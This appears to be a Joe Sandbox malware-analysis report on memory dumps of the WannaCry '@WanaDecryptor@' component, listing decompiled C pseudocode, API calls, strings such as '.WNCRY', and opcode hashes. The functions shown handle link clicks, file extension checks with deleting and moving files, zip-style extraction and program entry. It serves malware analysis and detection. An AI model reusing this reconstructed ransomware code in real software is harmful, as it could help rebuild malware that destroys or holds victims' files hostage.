                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                  • String ID: Arial
                                  • API String ID: 1126252797-493054409
                                  • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                  • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00406DC0(void* __ecx) {
                                  				int _v76;
                                  				int _v80;
                                  				char _v84;
                                  				int _v88;
                                  				long _v92;
                                  				void* _v96;
                                  				int _v100;
                                  				void* _v104;
                                  				long _t28;
                                  				void* _t29;
                                  				struct HWND__* _t30;
                                  				int _t32;
                                  				void* _t35;
                                  				int _t39;
                                  				long _t47;
                                  				int _t48;
                                  				void* _t51;
                                  
                                  				_t35 = __ecx;
                                  				_t48 = 0;
                                  				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
                                  				_t47 = _t28;
                                  				_v96 = 0;
                                  				_v92 = _t47;
                                  				_t4 = _t47 + 1; // 0x1
                                  				L00412CEC();
                                  				_t51 =  &_v104 + 4;
                                  				_v88 = _t28;
                                  				if(_t28 == 0) {
                                  					return _t28;
                                  				}
                                  				_t29 = _t35 + 0x4c0;
                                  				if(_t29 != 0) {
                                  					_t30 =  *(_t29 + 0x20);
                                  				} else {
                                  					_t30 = 0;
                                  				}
                                  				SendMessageA(_t30, 0x44b, _t48,  &_v96);
                                  				_t32 = _v88;
                                  				 *((char*)(_t32 + _t47)) = 0;
                                  				if(_t47 < 0) {
                                  					L15:
                                  					_push(_v88);
                                  					L00412C98();
                                  					return _t32;
                                  				} else {
                                  					do {
                                  						__imp___strnicmp(_t48 + _v88, "<http://", 8);
                                  						_t51 = _t51 + 0xc;
                                  						if(_t32 == 0) {
                                  							L7:
                                  							_t48 = _t48 + 1;
                                  							_t39 = _t48;
                                  							if(_t48 > _t47) {
                                  								goto L14;
                                  							}
                                  							_t32 = _v88;
                                  							while( *((char*)(_t48 + _t32)) != 0x3e) {
                                  								_t48 = _t48 + 1;
                                  								if(_t48 <= _t47) {
                                  									continue;
                                  								}
                                  								goto L14;
                                  							}
                                  							_t32 = _t48;
                                  							_t48 = _t48 + 1;
                                  							if(_t32 != 0xffffffff) {
                                  								_v100 = _t32;
                                  								_v104 = _t39;
                                  								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
                                  								_t32 = 0x20;
                                  								_push( &_v84);
                                  								_v84 = 0x54;
                                  								_v76 = 0x20;
                                  								_v80 = 0x20;
                                  								L00412F4A();
                                  							}
                                  							goto L14;
                                  						}
                                  						_t32 = _v88;
                                  						__imp___strnicmp(_t48 + _t32, "<https://", 9);
                                  						_t51 = _t51 + 0xc;
                                  						if(_t32 != 0) {
                                  							goto L14;
                                  						}
                                  						goto L7;
                                  						L14:
                                  						_t48 = _t48 + 1;
                                  					} while (_t48 <= _t47);
                                  					goto L15;
                                  				}
                                  			}

                                  APIs
                                  • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                  • #823.MFC42(00000001,?,?), ref: 00406DEC
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                  • _strnicmp.MSVCRT ref: 00406E3E
                                  • _strnicmp.MSVCRT ref: 00406E5A
                                  • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                  • #6136.MFC42 ref: 00406EC4
                                  • #825.MFC42(?), ref: 00406ED7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$_strnicmp$#6136#823#825
                                  • String ID: <http://$<https://$T
                                  • API String ID: 1228111698-1216084165
                                  • Opcode ID: d423051487410fe263d6ec4d138bc8bb6478c9a20731e0d0eb8aa801e432672a
                                  • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                  • Opcode Fuzzy Hash: d423051487410fe263d6ec4d138bc8bb6478c9a20731e0d0eb8aa801e432672a
                                  • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00402560(intOrPtr __ecx, WCHAR* _a4) {
                                  				short _v720;
                                  				intOrPtr _v724;
                                  				void* _t21;
                                  				void* _t22;
                                  				WCHAR* _t23;
                                  				void* _t30;
                                  				short* _t31;
                                  				intOrPtr* _t32;
                                  				void* _t34;
                                  				void* _t36;
                                  
                                  				_t23 = _a4;
                                  				_v724 = __ecx;
                                  				_t30 = 0;
                                  				wcscpy( &_v720, _t23);
                                  				_t31 = wcsrchr( &_v720, 0x2e);
                                  				_t34 =  &_v724 + 0x10;
                                  				if(_t31 == 0) {
                                  					L4:
                                  					wcscat( &_v720, L".org");
                                  				} else {
                                  					_t32 = __imp___wcsicmp;
                                  					_t21 =  *_t32(_t31, L".WNCRY");
                                  					_t36 = _t34 + 8;
                                  					if(_t21 == 0) {
                                  						L3:
                                  						 *_t31 = 0;
                                  						_t30 = 1;
                                  					} else {
                                  						_t22 =  *_t32(_t31, L".WNCYR");
                                  						_t34 = _t36 + 8;
                                  						if(_t22 != 0) {
                                  							goto L4;
                                  						} else {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  				if(E004020A0(_v724, _t23,  &_v720) == 0) {
                                  					DeleteFileW( &_v720);
                                  					goto L11;
                                  				} else {
                                  					if(DeleteFileW(_t23) == 0) {
                                  						L11:
                                  						return 0;
                                  					} else {
                                  						if(_t30 != 0) {
                                  							return 1;
                                  						} else {
                                  							return MoveFileW( &_v720, _t23);
                                  						}
                                  					}
                                  				}
                                  			}














                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                  • String ID: .WNCRY$.WNCYR$.org
                                  • API String ID: 1016768320-4283512309
                                  • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                  • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				void* _v0;
                                  				char _v260;
                                  				struct _FILETIME _v268;
                                  				struct _FILETIME _v276;
                                  				struct _FILETIME _v284;
                                  				void* _v292;
                                  				void* _v296;
                                  				signed int _v304;
                                  				char _v560;
                                  				struct _OVERLAPPED* _v820;
                                  				void* _v824;
                                  				void* _v827;
                                  				void* _v828;
                                  				long _v829;
                                  				void* _v836;
                                  				intOrPtr _t68;
                                  				long _t77;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t90;
                                  				void* _t91;
                                  				long _t94;
                                  				signed int _t97;
                                  				long _t99;
                                  				void* _t106;
                                  				int _t116;
                                  				long _t121;
                                  				signed int _t132;
                                  				signed int _t138;
                                  				unsigned int _t140;
                                  				signed int _t141;
                                  				void* _t154;
                                  				intOrPtr* _t157;
                                  				intOrPtr _t166;
                                  				void* _t174;
                                  				signed int _t175;
                                  				signed int _t176;
                                  				long _t177;
                                  				signed int _t178;
                                  				signed int _t179;
                                  				intOrPtr* _t180;
                                  				void* _t182;
                                  				long _t183;
                                  				intOrPtr* _t185;
                                  				void* _t187;
                                  				void* _t191;
                                  				void* _t192;
                                  
                                  				_t166 = _a16;
                                  				_t132 = __ecx;
                                  				if(_t166 == 3) {
                                  					_t68 =  *((intOrPtr*)(__ecx + 4));
                                  					_t176 = _a4;
                                  					__eflags = _t176 - _t68;
                                  					if(_t176 == _t68) {
                                  						L14:
                                  						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
                                  						__eflags = _t177;
                                  						if(_t177 <= 0) {
                                  							E00411AC0( *_t132);
                                  							 *(_t132 + 4) = 0xffffffff;
                                  						}
                                  						__eflags = _v829;
                                  						if(_v829 == 0) {
                                  							__eflags = _t177;
                                  							if(_t177 <= 0) {
                                  								asm("sbb eax, eax");
                                  								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
                                  								__eflags = _t77;
                                  								return _t77;
                                  							} else {
                                  								return 0x600;
                                  							}
                                  						} else {
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  					} else {
                                  						__eflags = _t68 - 0xffffffff;
                                  						if(_t68 != 0xffffffff) {
                                  							E00411AC0( *((intOrPtr*)(__ecx)));
                                  							_t187 = _t187 + 4;
                                  						}
                                  						_t81 =  *_t132;
                                  						 *(_t132 + 4) = 0xffffffff;
                                  						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
                                  						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
                                  							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
                                  							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
                                  								E00411390(_t81);
                                  								_t187 = _t187 + 4;
                                  							}
                                  							_t82 =  *_t132;
                                  							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                  							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
                                  								E004113E0(_t82);
                                  								_t82 =  *_t132;
                                  								_t187 = _t187 + 4;
                                  								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                  							}
                                  							_push( *((intOrPtr*)(_t132 + 0x138)));
                                  							_push( *_t132);
                                  							E00411660();
                                  							_t187 = _t187 + 8;
                                  							 *(_t132 + 4) = _t176;
                                  							goto L14;
                                  						} else {
                                  							return 0x10000;
                                  						}
                                  					}
                                  				} else {
                                  					if(_t166 == 2 || _t166 == 1) {
                                  						_t178 = _t175 | 0xffffffff;
                                  						__eflags =  *(_t132 + 4) - _t178;
                                  						if( *(_t132 + 4) != _t178) {
                                  							E00411AC0( *_t132);
                                  							_t187 = _t187 + 4;
                                  						}
                                  						_t90 =  *_t132;
                                  						 *(_t132 + 4) = _t178;
                                  						_t179 = _a4;
                                  						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
                                  						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
                                  							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
                                  							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
                                  								E00411390(_t90);
                                  								_t187 = _t187 + 4;
                                  							}
                                  							_t91 =  *_t132;
                                  							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                  							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
                                  								E004113E0(_t91);
                                  								_t91 =  *_t132;
                                  								_t187 = _t187 + 4;
                                  								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                  							}
                                  							_t138 = _t132;
                                  							E00411CF0(_t138, _t179,  &_v560);
                                  							__eflags = _v304 & 0x00000010;
                                  							if((_v304 & 0x00000010) == 0) {
                                  								__eflags = _t166 - 1;
                                  								if(_t166 != 1) {
                                  									_t157 = _a8;
                                  									_t185 = _t157;
                                  									_t180 = _t157;
                                  									_t94 =  *_t157;
                                  									__eflags = _t94;
                                  									while(_t94 != 0) {
                                  										__eflags = _t94 - 0x2f;
                                  										if(_t94 == 0x2f) {
                                  											L43:
                                  											_t185 = _t180 + 1;
                                  										} else {
                                  											__eflags = _t94 - 0x5c;
                                  											if(_t94 == 0x5c) {
                                  												goto L43;
                                  											}
                                  										}
                                  										_t94 =  *((intOrPtr*)(_t180 + 1));
                                  										_t180 = _t180 + 1;
                                  										__eflags = _t94;
                                  									}
                                  									asm("repne scasb");
                                  									_t140 =  !(_t138 | 0xffffffff);
                                  									_v828 =  &_v820;
                                  									_t182 = _t157 - _t140;
                                  									_t141 = _t140 >> 2;
                                  									_t97 = memcpy(_v828, _t182, _t141 << 2);
                                  									__eflags = _t185 - _t157;
                                  									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
                                  									_t191 = _t187 + 0x18;
                                  									if(__eflags != 0) {
                                  										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
                                  										_t99 = _v820;
                                  										__eflags = _t99 - 0x2f;
                                  										if(_t99 == 0x2f) {
                                  											L55:
                                  											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
                                  											E00412250(0, _t191 + 0x2c);
                                  											_t187 = _t191 + 0x18;
                                  											goto L48;
                                  										} else {
                                  											__eflags = _t99 - 0x5c;
                                  											if(_t99 == 0x5c) {
                                  												goto L55;
                                  											} else {
                                  												__eflags = _t99;
                                  												if(_t99 == 0) {
                                  													goto L47;
                                  												} else {
                                  													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
                                  													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
                                  														goto L47;
                                  													} else {
                                  														goto L55;
                                  													}
                                  												}
                                  											}
                                  										}
                                  										goto L73;
                                  									} else {
                                  										_v820 = 0;
                                  										L47:
                                  										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
                                  										E00412250(_t132 + 0x140, _t191 + 0x30);
                                  										_t187 = _t191 + 0x1c;
                                  									}
                                  									L48:
                                  									_t174 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0);
                                  								} else {
                                  									_t174 = _a8;
                                  								}
                                  								__eflags = _t174 - 0xffffffff;
                                  								if(_t174 != 0xffffffff) {
                                  									_push( *((intOrPtr*)(_t132 + 0x138)));
                                  									_push( *_t132);
                                  									E00411660();
                                  									_t106 =  *(_t132 + 0x13c);
                                  									_t192 = _t187 + 8;
                                  									__eflags = _t106;
                                  									if(_t106 == 0) {
                                  										_push(0x4000);
                                  										L00412CEC();
                                  										_t192 = _t192 + 4;
                                  										 *(_t132 + 0x13c) = _t106;
                                  									}
                                  									_v820 = 0;
                                  									while(1) {
                                  										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
                                  										_t192 = _t192 + 0x10;
                                  										__eflags = _t183 - 0xffffff96;
                                  										if(_t183 == 0xffffff96) {
                                  											break;
                                  										}
                                  										__eflags = _t183;
                                  										if(__eflags < 0) {
                                  											L68:
                                  											_v820 = 0x5000000;
                                  										} else {
                                  											if(__eflags <= 0) {
                                  												L63:
                                  												__eflags =  *(_t192 + 0x13);
                                  												if( *(_t192 + 0x13) != 0) {
                                  													SetFileTime(_t174,  &_v276,  &_v284,  &_v268);
                                  												} else {
                                  													__eflags = _t183;
                                  													if(_t183 == 0) {
                                  														goto L68;
                                  													} else {
                                  														continue;
                                  													}
                                  												}
                                  											} else {
                                  												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0);
                                  												__eflags = _t116;
                                  												if(_t116 == 0) {
                                  													_v820 = 0x400;
                                  												} else {
                                  													goto L63;
                                  												}
                                  											}
                                  										}
                                  										L70:
                                  										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
                                  										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
                                  											CloseHandle(_t174);
                                  										}
                                  										E00411AC0( *_t132);
                                  										return _v820;
                                  										goto L73;
                                  									}
                                  									_v820 = 0x1000;
                                  									goto L70;
                                  								} else {
                                  									return 0x200;
                                  								}
                                  							} else {
                                  								__eflags = _t166 - 1;
                                  								if(_t166 != 1) {
                                  									_t154 = _a8;
                                  									_t121 =  *_t154;
                                  									__eflags = _t121 - 0x2f;
                                  									if(_t121 == 0x2f) {
                                  										L36:
                                  										E00412250(0, _t154);
                                  										__eflags = 0;
                                  										return 0;
                                  									} else {
                                  										__eflags = _t121 - 0x5c;
                                  										if(_t121 == 0x5c) {
                                  											goto L36;
                                  										} else {
                                  											__eflags = _t121;
                                  											if(_t121 == 0) {
                                  												L37:
                                  												E00412250(_t132 + 0x140, _t154);
                                  												__eflags = 0;
                                  												return 0;
                                  											} else {
                                  												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
                                  												if( *((char*)(_t154 + 1)) != 0x3a) {
                                  													goto L37;
                                  												} else {
                                  													goto L36;
                                  												}
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = 0;
                                  									return 0;
                                  								}
                                  							}
                                  						} else {
                                  							return 0x10000;
                                  						}
                                  					} else {
                                  						return 0x10000;
                                  					}
                                  				}
                                  				L73:
                                  			}


















































                                  0x004125ba
                                  0x004125be
                                  0x004125c4
                                  0x004125ca
                                  0x004125cd
                                  0x004125d4
                                  0x004125d6
                                  0x004125d6
                                  0x004125d8
                                  0x0041264d
                                  0x00412652
                                  0x00412656
                                  0x00412658
                                  0x00412671
                                  0x00412684
                                  0x00412691
                                  0x00412696
                                  0x00000000
                                  0x0041265a
                                  0x0041265a
                                  0x0041265c
                                  0x00000000
                                  0x0041265e
                                  0x0041265e
                                  0x00412660
                                  0x00000000
                                  0x00412666
                                  0x00412666
                                  0x0041266b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041266b
                                  0x00412660
                                  0x0041265c
                                  0x00000000
                                  0x004125da
                                  0x004125da
                                  0x004125df
                                  0x004125f9
                                  0x00412605
                                  0x0041260a
                                  0x0041260a
                                  0x0041260d
                                  0x00412630
                                  0x0041257d
                                  0x0041257d
                                  0x0041257d
                                  0x00412632
                                  0x00412635
                                  0x004126a6
                                  0x004126a7
                                  0x004126a8
                                  0x004126ad
                                  0x004126b3
                                  0x004126b6
                                  0x004126b8
                                  0x004126ba
                                  0x004126bf
                                  0x004126c4
                                  0x004126c7
                                  0x004126c7
                                  0x004126d3
                                  0x004126db
                                  0x004126f4
                                  0x004126f6
                                  0x004126f9
                                  0x004126fc
                                  0x00000000
                                  0x00000000
                                  0x004126fe
                                  0x00412700
                                  0x0041273c
                                  0x0041273c
                                  0x00412702
                                  0x00412702
                                  0x0041271a
                                  0x0041271e
                                  0x00412720
                                  0x0041275f
                                  0x00412722
                                  0x00412722
                                  0x00412724
                                  0x00000000
                                  0x00412726
                                  0x00000000
                                  0x00412726
                                  0x00412724
                                  0x00412704
                                  0x00412714
                                  0x00412716
                                  0x00412718
                                  0x00412732
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412718
                                  0x00412702
                                  0x00412765
                                  0x00412765
                                  0x0041276d
                                  0x00412770
                                  0x00412770
                                  0x00412779
                                  0x0041278f
                                  0x00000000
                                  0x0041278f
                                  0x00412728
                                  0x00000000
                                  0x0041263a
                                  0x00412646
                                  0x00412646
                                  0x00412510
                                  0x00412510
                                  0x00412513
                                  0x00412524
                                  0x0041252b
                                  0x0041252d
                                  0x0041252f
                                  0x0041253f
                                  0x00412542
                                  0x0041254a
                                  0x00412556
                                  0x00412531
                                  0x00412531
                                  0x00412533
                                  0x00000000
                                  0x00412535
                                  0x00412535
                                  0x00412537
                                  0x00412559
                                  0x00412561
                                  0x00412569
                                  0x00412575
                                  0x00412539
                                  0x00412539
                                  0x0041253d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041253d
                                  0x00412537
                                  0x00412533
                                  0x00412518
                                  0x00412518
                                  0x00412521
                                  0x00412521
                                  0x00412513
                                  0x004124c2
                                  0x004124ce
                                  0x004124ce
                                  0x0041238d
                                  0x00412399
                                  0x00412399
                                  0x0041237b
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %s%s$%s%s%s$:
                                  • API String ID: 0-3034790606
                                  • Opcode ID: 5870813841fd6422a36b130af846364780db05c619c896662a0e99f340824b5b
                                  • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                  • Opcode Fuzzy Hash: 5870813841fd6422a36b130af846364780db05c619c896662a0e99f340824b5b
                                  • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                  				CHAR* _v8;
                                  				intOrPtr* _v24;
                                  				intOrPtr _v28;
                                  				struct _STARTUPINFOA _v96;
                                  				int _v100;
                                  				char** _v104;
                                  				int _v108;
                                  				void _v112;
                                  				char** _v116;
                                  				intOrPtr* _v120;
                                  				intOrPtr _v124;
                                  				void* _t27;
                                  				intOrPtr _t36;
                                  				signed int _t38;
                                  				int _t40;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t55;
                                  				intOrPtr _t58;
                                  				intOrPtr _t61;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x41baa8);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t58;
                                  				_v28 = _t58 - 0x68;
                                  				_v8 = 0;
                                  				__set_app_type(2);
                                  				 *0x422298 =  *0x422298 | 0xffffffff;
                                  				 *0x42229c =  *0x42229c | 0xffffffff;
                                  				 *(__p__fmode()) =  *0x42228c;
                                  				 *(__p__commode()) =  *0x422288;
                                  				 *0x422294 = _adjust_fdiv;
                                  				_t27 = E004133C7( *_adjust_fdiv);
                                  				_t61 =  *0x421790; // 0x1
                                  				if(_t61 == 0) {
                                  					__setusermatherr(E004133C4);
                                  				}
                                  				E004133B2(_t27);
                                  				_push(0x41f018);
                                  				_push(0x41f014);
                                  				L004133AC();
                                  				_v112 =  *0x422284;
                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
                                  				_push(0x41f010);
                                  				_push(0x41f000);
                                  				L004133AC();
                                  				_t55 =  *_acmdln;
                                  				_v120 = _t55;
                                  				if( *_t55 != 0x22) {
                                  					while( *_t55 > 0x20) {
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  					}
                                  				} else {
                                  					do {
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  						_t42 =  *_t55;
                                  					} while (_t42 != 0 && _t42 != 0x22);
                                  					if( *_t55 == 0x22) {
                                  						L6:
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  					}
                                  				}
                                  				_t36 =  *_t55;
                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                  					goto L6;
                                  				}
                                  				_v96.dwFlags = 0;
                                  				GetStartupInfoA( &_v96);
                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                  					_t38 = 0xa;
                                  				} else {
                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                  				}
                                  				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                                  				_v108 = _t40;
                                  				exit(_t40);
                                  				_t41 = _v24;
                                  				_t49 =  *((intOrPtr*)( *_t41));
                                  				_v124 = _t49;
                                  				_push(_t41);
                                  				_push(_t49);
                                  				L004133A6();
                                  				return _t41;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                  • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00404280(void* __ecx, char _a8) {
                                  				void* _t9;
                                  				struct HWND__* _t10;
                                  				long _t12;
                                  				long* _t22;
                                  				void* _t24;
                                  
                                  				_t24 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                  					E00404530(__ecx);
                                  				}
                                  				_t9 = E004045E0(_t24,  &_a8);
                                  				if(_t9 == 0) {
                                  					L6:
                                  					L00412CBC();
                                  					return _t9;
                                  				} else {
                                  					_t22 = _t24 + 0x44;
                                  					_push(0);
                                  					_push("mailto:");
                                  					L00412DB2();
                                  					if(_t9 != 0) {
                                  						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
                                  						goto L6;
                                  					} else {
                                  						_t10 = GetParent( *(_t24 + 0x20));
                                  						_push(_t10);
                                  						L00412DAC();
                                  						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
                                  						L00412CBC();
                                  						return _t12;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                  • GetParent.USER32(?), ref: 004042BB
                                  • #2864.MFC42(00000000), ref: 004042C2
                                  • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                  • #2379.MFC42 ref: 004042DD
                                    • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                    • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                    • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
